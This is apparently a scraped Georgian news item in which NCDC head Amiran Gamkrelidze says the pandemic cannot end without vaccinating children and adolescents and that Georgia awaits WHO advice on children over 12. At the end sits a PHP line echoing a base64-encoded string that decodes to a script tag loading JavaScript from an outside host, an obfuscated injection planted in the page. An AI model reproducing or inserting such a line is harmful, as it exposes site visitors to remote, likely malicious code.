celsiusi
ავერსი საქკაბელი
დაავადებათა კონტროლის ცენტრის დირექტორის ამირან გამყრელიძის განცხადებით,  თუ ბავშვების და მოზარდების იმუნიზაცია არ ჩატარდა ისე საბოლოო წერტილი პანდემიას ვერ დაესმება. 
 
თუმცა როგორც NCDC-ის ხელმძღვანელი განმარტავს ამ ეტაპზე საქართველო ბავშვთა იმუნიზაციის პროცესში ჩართვის შესახებ ჯანმოს რეკომენდაციას ელოდება. 
 
"თუ ბავშვების და მოზარდების იმუნიზაცია არ ჩატარდა ისე საბოლოო წერტილი პანდემიას ვერ დაესმება. ბავშვები ყველაზე მეტად არიან გამავრცელებლები. 
 
ჩვენ საბოლოო გადაწყვეტილებას ჯანმოს მიხედვით ვიღებთ, იქ მიმდინარეობს 12 წლის ზემოთ ბავშვების იმუნიზაციაზე საუბარი, სექტემბრის ბოლოს კი გადაწყვეტილება იქნება ცნობილი.
 
არ გამოვრიცხავ,რომ ჩვენ შიდა განხილვების ფარგლებში ეს საკითხები მიმოვიხილოთ,"- აცხადებს გამყრელიძე. 
1494
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");